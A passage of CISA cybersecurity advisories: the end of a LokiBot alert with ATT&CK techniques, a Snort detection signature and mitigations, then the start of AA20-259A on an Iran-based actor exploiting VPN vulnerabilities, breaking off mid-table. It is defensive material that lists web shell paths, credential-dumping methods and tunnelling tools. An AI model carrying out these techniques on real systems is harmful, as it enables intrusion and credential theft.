<li><strong>March 2017:</strong> Check Point discovered LokiBot malware found pre-installed on Android devices.[<a href="https://blog.checkpoint.com/2017/03/10/preinstalled-malware-targeting-mobile-users/">9</a>]</li> <li><strong>December 2016:</strong> Dr.Web researchers identified a new LokiBot variant targeting Android core libraries.[<a href="https://www.bleepingcomputer.com/news/security/loki-trojan-infects-android-libraries-and-system-process-to-get-root-privileges/">10</a>]</li> <li><strong>February 2016: </strong>Researchers discovered the LokiBot Android Trojan infecting the core Android operating system processes.[<a href="https://www.cyber.nj.gov/threat-center/threat-profiles/android-malware-variants/lokibot">11</a>]</li> </ul> <h3>MITRE ATT&amp;CK Techniques</h3> <p>According to MITRE, <a href="https://attack.mitre.org/versions/v7/software/S0447/">LokiBot</a> uses the ATT&amp;CK techniques listed in table 1.</p> <p class="italic text-align-center"><em>Table 1: LokiBot ATT&amp;CK techniques </em></p> <table border="1" cellpadding="1" cellspacing="1" class="general-table" height="534" style="margin-left: auto; margin-right: auto;" width="955"> <thead> <tr> <th scope="col" style="width: 448px;"> <p>Technique</p> </th> <th scope="col" style="width: 492px;"> <p>Use</p> </th> </tr> </thead> <tbody> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>System Network Configuration Discovery</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1016">T1016</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>LokiBot has the ability to discover the domain name of the infected host.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Obfuscated Files or Information</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1027/">T1027</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>LokiBot has obfuscated strings with base64 encoding.</p> </td> </tr> 
<tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Obfuscated Files or Information: Software Packing</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1027/002/">T1027.002</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>LokiBot has used several packing methods for obfuscation.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>System Owner/User Discovery</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1033">T1033</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>LokiBot has the ability to discover the username on the infected host.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Exfiltration Over C2 Channel</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1041/">T1041</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>LokiBot has the ability to initiate contact with command and control to exfiltrate stolen data.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Process Injection: Process Hollowing</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1055/012/">T1055.012</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>LokiBot has used process hollowing to inject into legitimate Windows process vbc.exe.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Input Capture: Keylogging</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1056/001">T1056.001</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>LokiBot has the ability to capture input on the compromised host via keylogging.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Application Layer Protocol: Web Protocols </em>[<a href="https://attack.mitre.org/versions/v7/techniques/T1071/001">T1071.001</a>]</p> </td> <td scope="col" 
style="text-align: left; width: 492px;"> <p>LokiBot has used Hypertext Transfer Protocol for command and control.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>System Information Discovery</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1082">T1082</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>LokiBot has the ability to discover the computer name and Windows product name/version.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>User Execution: Malicious File</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1204/002/">T1204.002</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>LokiBot has been executed through malicious documents contained in spearphishing emails.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Credentials from Password Stores</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1555/">T1555</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>LokiBot has stolen credentials from multiple applications and data sources including Windows operating system credentials, email clients, File Transfer Protocol, and Secure File Transfer Protocol clients.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Credentials from Password Stores: Credentials from Web Browsers</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1555/003">T1555.003</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>LokiBot has demonstrated the ability to steal credentials from multiple applications and data sources including Safari and Chromium and Mozilla Firefox-based web browsers.</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p><em>Hide Artifacts: Hidden Files and Directories</em> [<a 
href="https://attack.mitre.org/versions/v7/techniques/T1564/001/">T1564.001</a>]</p> </td> <td scope="col" style="text-align: left; width: 492px;"> <p>LokiBot has the ability to copy itself to a hidden file and directory.</p> </td> </tr> </tbody> </table> <h3>Detection</h3> <h4>Signatures</h4> <p>CISA developed the following Snort signature for use in detecting network activity associated with LokiBot activity.</p> <div class="special_container">alert tcp any any -&gt; any $HTTP_PORTS (msg:"Lokibot:HTTP URI POST contains '/*/fre.php' post-infection"; flow:established,to_server; flowbits:isnotset,.tagged; content:"/fre.php"; http_uri; fast_pattern:only; urilen:&lt;50,norm; content:"POST"; nocase; http_method; pcre:"/\/(?:alien|loky\d|donep|jemp|lokey|new2|loki|Charles|sev7n|dbwork|scroll\/NW|wrk|job|five\d?|donemy|animation\dkc|love|Masky|v\d|lifetn|Ben)\/fre\.php$/iU"; flowbits:set,.tagged;classtype:http-uri; metadata:service http; metadata:pattern HTTP-P001,)</div> <h3>Mitigations</h3><p>CISA and MS-ISAC recommend that federal, state, local, tribal, territorial government, private sector users, and network administrators consider applying the following best practices to strengthen the security posture of their organization's systems. System owners and administrators should review any configuration changes prior to implementation to avoid unwanted impacts.</p> <ul> <li>Maintain up-to-date antivirus signatures and engines. See <a href="https://www.us-cert.gov/ncas/tips/ST18-271">Protecting Against Malicious Code</a>.</li> <li>Keep operating system patches up to date. See <a href="https://www.us-cert.gov/ncas/tips/ST04-006">Understanding Patches and Software Updates</a>.</li> <li>Disable file and printer sharing services. If these services are required, use <a href="https://us-cert.cisa.gov/ncas/tips/ST04-002">strong passwords</a> or Active Directory authentication.</li> <li>Enforce multi-factor authentication. 
See <a href="https://www.us-cert.gov/ncas/tips/ST05-012">Supplementing Passwords </a>for more information.</li> <li>Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators’ group unless required.</li> <li>Enforce a strong password policy. See <a href="https://www.us-cert.gov/ncas/tips/ST04-002">Choosing and Protecting Passwords</a>.</li> <li>Exercise caution when opening email attachments, even if the attachment is expected and the sender appears to be known. See <a href="https://www.us-cert.gov/ncas/tips/ST04-010">Using Caution with Email Attachments</a>.</li> <li>Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.</li> <li>Disable unnecessary services on agency workstations and servers.</li> <li>Scan for and remove suspicious email attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).</li> <li>Monitor users' web browsing habits; restrict access to sites with unfavorable content.</li> <li>Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs).</li> <li>Scan all software downloaded from the internet prior to executing.</li> <li>Maintain situational awareness of the latest threats and implement appropriate access control lists.</li> <li>Visit the MITRE ATT&amp;CK Techniques pages (linked in table 1 above) for additional mitigation and detection strategies.</li> </ul> <p>For additional information on malware incident prevention and handling, see the National Institute of Standards and Technology Special Publication 800-83, <a href="https://csrc.nist.gov/publications/detail/sp/800-83/rev-1/final">Guide to Malware Incident Prevention and Handling for Desktops and Laptops</a>.</p> <h3>Resources</h3> <p>Center for Internet Security Security Event Primer – Malware: <a 
href="https://www.cisecurity.org/white-papers/security-event-primer-malware/">https://www.cisecurity.org/white-papers/security-event-primer-malware/</a><br /> MITRE ATT&amp;CK – LokiBot: <a href="https://attack.mitre.org/versions/v7/software/S0447/">https://attack.mitre.org/software/S0447/</a><br /> MITRE ATT&amp;CK for Enterprise: <a href="https://attack.mitre.org/versions/v7/matrices/enterprise/">https://attack.mitre.org/matrices/enterprise/</a></p> <h3>References</h3> <ul> <li><a href="https://blog.trendmicro.com/trendlabs-security-intelligence/lokibot-impersonates-popular-game-launcher-and-drops-compiled-c-code-file/">[1] Trend Micro: LokiBot Impersonates Popular Game Launcher and Drops Compiled C# Code File </a></li> <li><a href="https://www.fortinet.com/blog/threat-research/new-infostealer-attack-uses-lokibot#:~:text=The%20FortiGuard%20Labs%20SE%20team%20identified%20a%20new,manufacturing%20company%20utilizing%20the%20well%20documented%20infostealer%20LokiBot.">[2] Fortinet: Newly Discovered Infostealer Attack Uses LokiBot </a></li> <li><a href="https://www.zdnet.com/article/lokibot-information-stealer-now-hides-malware-in-image-files/">[3] ZDNet: LokiBot Malware Now Hides its Source Code in Image Files</a></li> <li><a href="https://www.securityweek.com/lokibot-and-nanocore-malware-distributed-iso-image-files">[4] SecurityWeek: LokiBot and NanoCore Malware Distributed in ISO Image Files</a></li> <li><a href="https://www.netskope.com/blog/lokibot-nanocore-iso-disk-image-files">[5] Netskope: LokiBot & NanoCore being distributed via ISO disk image files </a></li> <li><a href="https://www.trendmicro.com/en_us/research/18/b/attack-using-windows-installer-msiexec-exe-leads-lokibot.html">[6] Trend Micro: Attack Using Windows Installer Leads to LokiBot</a></li> <li><a href="https://www.bleepingcomputer.com/news/security/lokibot-android-banking-trojan-turns-into-ransomware-when-you-try-to-remove-it/">[7] BleepingComputer: LokiBot Android Banking Trojan Turns Into 
Ransomware When You Try to Remove It</a></li> <li><a href="https://www.fortinet.com/blog/threat-research/new-loki-variant-being-spread-via-pdf-file">[8] Fortinet: New Loki Variant Being Spread via PDF File</a></li> <li><a href="https://blog.checkpoint.com/2017/03/10/preinstalled-malware-targeting-mobile-users/">[9] Check Point: Preinstalled Malware Targeting Mobile Users</a></li> <li><a href="https://www.bleepingcomputer.com/news/security/loki-trojan-infects-android-libraries-and-system-process-to-get-root-privileges/">[10] BleepingComputer: Loki Trojan Infects Android Libraries and System Process to Get Root Privileges</a></li> <li><a href="https://www.cyber.nj.gov/threat-center/threat-profiles/android-malware-variants/lokibot">[11] New Jersey Cybersecurity & Communications Integration Cell: LokiBot  </a></li> </ul> <h3>Revisions</h3> <ul> <li>September 22, 2020: Initial Version</li> <li>September 23, 2020: Added hyperlink to MS-ISAC</li> </ul> <hr /> <div class="field field--name-body field--type-text-with-summary field--label-hidden field--item"><p class="privacy-and-terms">This product is provided subject to this <a href="https://us-cert.cisa.gov/privacy/notification">Notification</a> and this <a href="https://www.dhs.gov/privacy-policy">Privacy &amp; Use</a> policy.</p> </div>

AA20-259A: Iran-Based Threat Actor Exploits VPN Vulnerabilities
Original release date: September 15, 2020<br/><h3>Summary</h3><p class="tip-intro" style="font-size: 15px;"><em>This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK®) framework. See the <a href="https://attack.mitre.org/matrices/enterprise/">ATT&amp;CK for Enterprise</a> framework for all referenced threat actor techniques.</em></p> <p>This product was written by the Cybersecurity and Infrastructure Security Agency (CISA) with contributions from the Federal Bureau of Investigation (FBI). CISA and FBI are aware of an Iran-based malicious cyber actor targeting several U.S. federal agencies and other U.S.-based networks. Analysis of the threat actor’s indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) indicates a correlation with the group known by the names Pioneer Kitten and UNC757. This threat actor has been observed exploiting several publicly known Common Vulnerabilities and Exposures (CVEs) dealing with Pulse Secure virtual private network (VPN), Citrix NetScaler, and F5 vulnerabilities. This threat actor used these vulnerabilities to gain initial access to targeted networks and then maintained access within the successfully exploited networks for several months using multiple means of persistence.</p> <p>This Advisory provides the threat actor’s TTPs, IOCs, and exploited CVEs to help administrators and network defenders identify a potential compromise of their network and protect their organization from future attacks.</p> <p><a href="https://us-cert.cisa.gov/sites/default/files/publications/AA20-259A-Iran-Based_Threat_Actor_Exploits_VPN_Vulnerabilities_S508C.pdf">Click here</a> for a PDF version of this report.</p> <h3>Technical Details</h3><p>CISA and FBI are aware of a widespread campaign from an Iran-based malicious cyber actor targeting several industries mainly associated with information technology, government, healthcare, financial, insurance, and media sectors across the United States. 
The threat actor conducts mass-scanning and uses tools, such as Nmap, to identify open ports. Once the open ports are identified, the threat actor exploits CVEs related to VPN infrastructure to gain initial access to a targeted network. CISA and the FBI have observed the threat actor exploiting multiple CVEs, including CVE-2019-11510, CVE-2019-11539, CVE-2019-19781, and CVE-2020-5902.</p> <p>After gaining initial access to a targeted network, the threat actor obtains administrator-level credentials and installs web shells allowing further entrenchment. After establishing a foothold, the threat actor’s goals appear to be maintaining persistence and exfiltrating data. This threat actor has been observed selling access to compromised network infrastructure in an online hacker forum. Industry reporting indicates that the threat actor operates as a contractor supporting Iranian government interests, but the malicious activity appears to also serve the threat actor’s own financial interests. The FBI notes this threat actor has the capability, and likely the intent, to deploy ransomware on victim networks.</p> <p>CISA and FBI have observed this Iran-based threat actor relying on exploits of remote external services on internet-facing assets to gain initial access to victim networks. 
The threat actor also relies heavily on open-source and operating system (OS) tooling to conduct operations, such as ngrok; fast reverse proxy (FRP); Lightweight Directory Access Protocol (LDAP) directory browser; as well as web shells known as ChunkyTuna, Tiny, and China Chopper.</p> <p>Table 1 illustrates some of the common tools this threat actor has used.</p> <p class="italic text-align-center"><em>Table 1: Common exploit tools</em></p> <table border="1" cellpadding="1" cellspacing="1" class="general-table" height="632" style="margin-left: auto; margin-right: auto;" width="955"> <thead> <tr> <th scope="col" style="width: 448px;"> <p>Tool</p> </th> <th scope="col" style="width: 492px;"> <p>Detail</p> </th> </tr> </thead> <tbody> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p>ChunkyTuna web shell</p> </td> <td scope="col" style="text-align: left; width: 492px;">ChunkyTuna allows for chunked transfer encoding hypertext transfer protocol (HTTP) that tunnels Transmission Control Protocol (TCP) streams over HTTP. The web shell allows for reverse connections to a server with the intent to exfiltrate data.</td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p>Tiny web shell</p> </td> <td scope="col" style="text-align: left; width: 492px;">Tiny uses Hypertext Preprocessor (PHP) to create a backdoor. It has the capability to allow a threat actor remote access to the system and can also tunnel or route traffic.</td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;"> <p>China Chopper web shell</p> </td> <td scope="col" style="text-align: left; width: 492px;">China Chopper is a web shell hosted on a web server and is mainly used for web application attacks; it is configured in a client/server relationship. 
China Chopper contains security scanners and can be used to upload files and brute-force passwords.</td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;">FRPC</td> <td scope="col" style="text-align: left; width: 492px;">FRPC is a modified version of the open-source FRP tool. It allows a system—inside a router or firewall providing Network Address Translation—to provide network access to systems/operators located outside of the victim network. In this case, FRPC was used as reverse proxy, tunneling Remote Desktop Protocol (RDP) over Transport Layer Security (TLS), giving the threat actor primary persistence.</td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;">Chisel</td> <td scope="col" style="text-align: left; width: 492px;">Chisel is a fast TCP tunnel over HTTP and secured via Secure Shell (SSH). It is a single executable that includes both client and server. The tool is useful for passing through firewalls, but it can also be used to provide a secure form of communication to an endpoint on a victim network.</td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;">ngrok</td> <td scope="col" style="text-align: left; width: 492px;">ngrok is a tool used to expose a local port to the internet. 
Optionally, tunnels can be secured with TLS.</td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;">Nmap</td> <td scope="col" style="text-align: left; width: 492px;">Nmap is used for vulnerability scanning and network discovery.</td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;">Angry IP Scanner</td> <td>Angry IP Scanner is a scanner that can ping a range of Internet Protocol (IP) addresses to check if they are active and can also resolve hostnames, scan ports, etc.</td> </tr> <tr> <td scope="col" style="text-align: left; width: 448px;">Drupwn</td> <td scope="col" style="text-align: left; width: 492px;">Drupwn is a Python-based tool used to scan for vulnerabilities and exploit CVEs in Drupal devices.</td> </tr> </tbody> </table> <p><br /> Notable means of detecting this threat actor:</p> <ul> <li>CISA and the FBI note that this group makes significant use of ngrok, which may appear as TCP port 443 connections to external cloud-based infrastructure.</li> <li>The threat actor uses FRPC over port 7557.</li> <li><a href="https://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a">Malware Analysis Report MAR-10297887-1.v1</a> details some of the tools this threat actor used against some victims.</li> </ul> <p>The following file paths can be used to detect Tiny web shell, ChunkyTuna web shell, or Chisel if a network has been compromised by this attacker exploiting CVE-2019-19781.</p> <ul> <li>Tiny web shell</li> </ul> <p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; /netscaler/ns_gui/admin_ui/rdx/core/css/images/css.php<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; /netscaler/ns_gui/vpn/images/vpn_ns_gui.php<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; /var/vpn/themes/imgs/tiny.php</code></p> <ul> <li>ChunkyTuna web shell</li> </ul> <p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; /var/vpn/themes/imgs/debug.php<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; /var/vpn/themes/imgs/include.php<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 
/var/vpn/themes/imgs/whatfile</code></p> <ul> <li>Chisel</li> </ul> <p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; /var/nstmp/chisel</code></p> <h3>MITRE ATT&amp;CK Framework</h3> <h4>Initial Access</h4> <p>As indicated in table 2, the threat actor primarily gained initial access by using the publicly available exploit for CVE-2019-19781. From there, the threat actor used the Citrix environment to establish a presence on an internal network server.</p> <p class="italic text-align-center"><em>Table 2: Initial access techniques</em></p> <table border="1" cellpadding="1" cellspacing="1" class="general-table" height="180" style="margin-left: auto; margin-right: auto;" width="955"> <thead> <tr> <th scope="col" style="width: 125px;"> <p>ID</p> </th> <th scope="col" style="width: 254px;"> <p>Technique/Sub-Technique</p> </th> <th scope="col" style="width: 424px;"> <p>Context</p> </th> </tr> </thead> <tbody> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1190/">T1190</a></p> </td> <td scope="col" style="width: 254px;">Exploit Public-Facing Application</td> <td scope="col" style="width: 424px;">The threat actor primarily gained initial access by compromising a Citrix NetScaler remote access server using a publicly available exploit for CVE-2019-19781. 
The threat actor also exploited CVE-2019-11510, CVE-2019-11539, and CVE-2020-5902.</td> </tr> </tbody> </table> <h4>Execution</h4> <p>After gaining initial access, the threat actor began executing scripts, as shown in table 3.</p> <p class="italic text-align-center"><em>Table 3: Execution techniques</em></p> <table border="1" cellpadding="1" cellspacing="1" class="general-table" height="180" style="margin-left: auto; margin-right: auto;" width="955"> <thead> <tr> <th scope="col" style="width: 125px;"> <p>ID</p> </th> <th scope="col" style="width: 254px;"> <p>Technique/Sub-Technique</p> </th> <th scope="col" style="width: 424px;"> <p>Context</p> </th> </tr> </thead> <tbody> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1059/001/">T1059.001</a></p> </td> <td scope="col" style="width: 254px;">Command and Scripting Interpreter: PowerShell</td> <td scope="col" style="width: 424px;">A PowerShell script (<code>keethief</code> and <code>kee.ps1</code>) was used to access KeePass data.</td> </tr> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1059/003/">T1059.003</a></p> </td> <td scope="col" style="width: 254px;">Command and Scripting Interpreter: Windows Command Shell</td> <td scope="col" style="width: 424px;"><code>cmd.exe</code> was launched via sticky keys and was likely used as a password-changing mechanism.</td> </tr> </tbody> </table> <h4>Persistence</h4> <p>CISA observed the threat actor using the techniques identified in table 4 to establish persistence.</p> <p class="italic text-align-center"><em>Table 4: Persistence techniques</em></p> <table border="1" cellpadding="1" cellspacing="1" class="general-table" height="180" style="margin-left: auto; margin-right: auto;" width="955"> <thead> <tr> <th scope="col" style="width: 125px;"> <p>ID</p> </th> <th scope="col" style="width: 254px;"> <p>Technique/Sub-Technique</p> </th> <th scope="col" style="width: 424px;"> 
<p>Context</p> </th> </tr> </thead> <tbody> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1053/003/">T1053.003</a></p> </td> <td scope="col" style="width: 254px;">Scheduled Task/Job: Cron</td> <td scope="col" style="width: 424px;">The threat actor loaded a series of scripts to <code>cron</code> and ran them for various purposes (mainly to access NetScaler web forms).</td> </tr> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1053/005/">T1053.005</a></p> </td> <td scope="col" style="width: 254px;">Scheduled Task/Job: Scheduled Task</td> <td scope="col" style="width: 424px;">The threat actor installed and used FRPC (<code>frpc.exe</code>) on both NetScaler and internal devices. The task was named <code>lpupdate</code> and the binary was named <code>svchost</code>, which was the reverse proxy. The threat actor executed this command daily.</td> </tr> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1505/003/">T1505.003</a></p> </td> <td scope="col" style="width: 254px;">Server Software Component: Web Shell</td> <td scope="col" style="width: 424px;">The threat actor used several web shells on existing web servers. Both NetScaler and web servers called out for ChunkyTuna.</td> </tr> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1546/008/">T1546.008</a></p> </td> <td scope="col" style="width: 254px;">Event Triggered Execution: Accessibility Features</td> <td scope="col" style="width: 424px;">The threat actor used sticky keys (<code>sethc.exe</code>) to launch <code>cmd.exe</code>.</td> </tr> </tbody> </table> <h4>Privilege Escalation</h4> <p>CISA observed no evidence of direct privilege escalation. 
The threat actor attained domain administrator credentials on the NetScaler device via exploit and continued to expand credential access on the network.</p> <h4>Defense Evasion</h4> <p>CISA observed the threat actor using the techniques identified in table 5 to evade detection.</p> <p class="italic text-align-center"><em>Table 5: Defensive evasion techniques</em></p> <table border="1" cellpadding="1" cellspacing="1" class="general-table" height="180" style="margin-left: auto; margin-right: auto;" width="955"> <thead> <tr> <th scope="col" style="width: 125px;"> <p>ID</p> </th> <th scope="col" style="width: 254px;"> <p>Technique/Sub-Technique</p> </th> <th scope="col" style="width: 424px;"> <p>Context</p> </th> </tr> </thead> <tbody> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1027/002/">T1027.002</a></p> </td> <td scope="col" style="width: 254px;">Obfuscated Files or Information: Software Packing</td> <td scope="col" style="width: 424px;">The threat actor used base64 encoding for payloads on NetScaler during initial access, making the pre-compiled payloads harder to detect.</td> </tr> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1027/004/">T1027.004</a></p> </td> <td scope="col" style="width: 254px;">Obfuscated Files or Information: Compile After Delivery</td> <td scope="col" style="width: 424px;">The threat actor used base64 encoding schemes on distributed (uncompiled) scripts and files to avoid detection.</td> </tr> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1036/004/">T1036.004</a></p> </td> <td scope="col" style="width: 254px;">Masquerading: Masquerade Task or Service</td> <td scope="col" style="width: 424px;">The threat actor used FRPC (<code>frpc.exe</code>) daily as a reverse proxy, tunneling RDP over TLS. 
The FRPC (<code>frpc.exe</code>) task name was <code>lpupdate</code> and ran out of the Input Method Editor (IME) directory. In other events, the threat actor has been observed hiding activity via ngrok.</td> </tr> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1036/005/">T1036.005</a></p> </td> <td scope="col" style="width: 254px;">Masquerading: Match Legitimate Name or Location</td> <td scope="col" style="width: 424px;">The FRPC (<code>frpc.exe</code>) binary name was <code>svchost</code>, and the configuration file was <code>dllhost.dll</code>, attempting to masquerade as a legitimate Dynamic Link Library.</td> </tr> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1070/004/">T1070.004</a></p> </td> <td scope="col" style="width: 254px;">Indicator Removal on Host: File Deletion</td> <td scope="col" style="width: 424px;">To minimize their footprint, the threat actor ran <code>./httpd-nscache_clean</code> every 30 minutes, which cleaned up files on the NetScaler device.</td> </tr> </tbody> </table> <h4>Credential Access</h4> <p>CISA observed the threat actor using the techniques identified in table 6 to further their credential access.</p> <p class="italic text-align-center"><em>Table 6: Credential access techniques</em></p> <table border="1" cellpadding="1" cellspacing="1" class="general-table" height="180" style="margin-left: auto; margin-right: auto;" width="955"> <thead> <tr> <th scope="col" style="width: 125px;"> <p>ID</p> </th> <th scope="col" style="width: 254px;"> <p>Technique/Sub-Technique</p> </th> <th scope="col" style="width: 424px;"> <p>Context</p> </th> </tr> </thead> <tbody> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1003/001/">T1003.001</a></p> </td> <td scope="col" style="width: 254px;">OS Credential Dumping: LSASS Memory</td> <td scope="col" style="width: 424px;">The threat actor used <code>procdump</code> to dump 
process memory from the Local Security Authority Subsystem Service (LSASS).</td> </tr> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1003/003/">T1003.003</a></p> </td> <td scope="col" style="width: 254px;">OS Credential Dumping: Windows NT Directory Services (NTDS)</td> <td scope="col" style="width: 424px;">The threat actor used Volume Shadow Copy to access credential information from the NTDS file.</td> </tr> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1552/001/">T1552.001</a></p> </td> <td scope="col" style="width: 254px;">Unsecured Credentials: Credentials in Files</td> <td scope="col" style="width: 424px;">The threat actor accessed files containing valid credentials.</td> </tr> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1555/">T1555</a></p> </td> <td scope="col" style="width: 254px;">Credentials from Password Stores</td> <td scope="col" style="width: 424px;">The threat actor accessed a <code>KeePass</code> database multiple times and used <code>kee.ps1</code> PowerShell script.</td> </tr> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1558/">T1558</a></p> </td> <td scope="col" style="width: 254px;">Steal or Forge Kerberos Tickets</td> <td scope="col" style="width: 424px;">The threat actor conducted a directory traversal attack by creating files and exfiltrating a Kerberos ticket on a NetScaler device. 
The threat actor was then able to gain access to a domain account.</td> </tr> </tbody> </table> <h4>Discovery</h4> <p>CISA observed the threat actor using the techniques identified in table 7 to learn more about the victim environments.</p> <p class="italic text-align-center"><em>Table 7: Discovery techniques</em></p> <table border="1" cellpadding="1" cellspacing="1" class="general-table" height="180" style="margin-left: auto; margin-right: auto;" width="955"> <thead> <tr> <th scope="col" style="width: 125px;"> <p>ID</p> </th> <th scope="col" style="width: 254px;"> <p>Technique/Sub-Technique</p> </th> <th scope="col" style="width: 424px;"> <p>Context</p> </th> </tr> </thead> <tbody> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1018/">T1018</a></p> </td> <td scope="col" style="width: 254px;">Remote System Discovery</td> <td scope="col" style="width: 424px;">The threat actor used Angry IP Scanner to detect remote systems.</td> </tr> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1083/">T1083</a></p> </td> <td scope="col" style="width: 254px;">File and Directory Discovery</td> <td scope="col" style="width: 424px;">The threat actor used WizTree to obtain network files and directory listings.</td> </tr> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1087/">T1087</a></p> </td> <td scope="col" style="width: 254px;">Account Discovery</td> <td scope="col" style="width: 424px;">The threat actor accessed <code>ntuser.dat</code> and <code>UserClass.dat</code> and used Softerra LDAP Browser to browse documentation for service accounts.</td> </tr> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1217/">T1217</a></p> </td> <td scope="col" style="width: 254px;">Browser Bookmark Discovery</td> <td scope="col" style="width: 424px;">The threat actor used Google Chrome bookmarks to find internal 
resources and assets.</td> </tr> </tbody> </table> <h4>Lateral Movement</h4> <p>CISA also observed the threat actor using open-source tools such as Plink and TightVNC for lateral movement. CISA observed the threat actor using the techniques identified in table 8 for lateral movement within the victim environment.</p> <p class="italic text-align-center"><em>Table 8: Lateral movement techniques</em></p> <table border="1" cellpadding="1" cellspacing="1" class="general-table" height="180" style="margin-left: auto; margin-right: auto;" width="955"> <thead> <tr> <th scope="col" style="width: 125px;"> <p>ID</p> </th> <th scope="col" style="width: 254px;"> <p>Technique/Sub-Technique</p> </th> <th scope="col" style="width: 424px;"> <p>Context</p> </th> </tr> </thead> <tbody> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1021/">T1021</a></p> </td> <td scope="col" style="width: 254px;">Remote Services</td> <td scope="col" style="width: 424px;">The threat actor used RDP with valid account credentials for lateral movement in the environment.</td> </tr> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1021/001/">T1021.001</a></p> </td> <td scope="col" style="width: 254px;">Remote Services: Remote Desktop Protocol</td> <td scope="col" style="width: 424px;">The threat actor used RDP to log in and then conduct lateral movement.</td> </tr> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1021/002/">T1021.002</a></p> </td> <td scope="col" style="width: 254px;">Remote Services: SMB/Windows Admin Shares</td> <td scope="col" style="width: 424px;">The threat actor used PsExec and PSEXECSVC 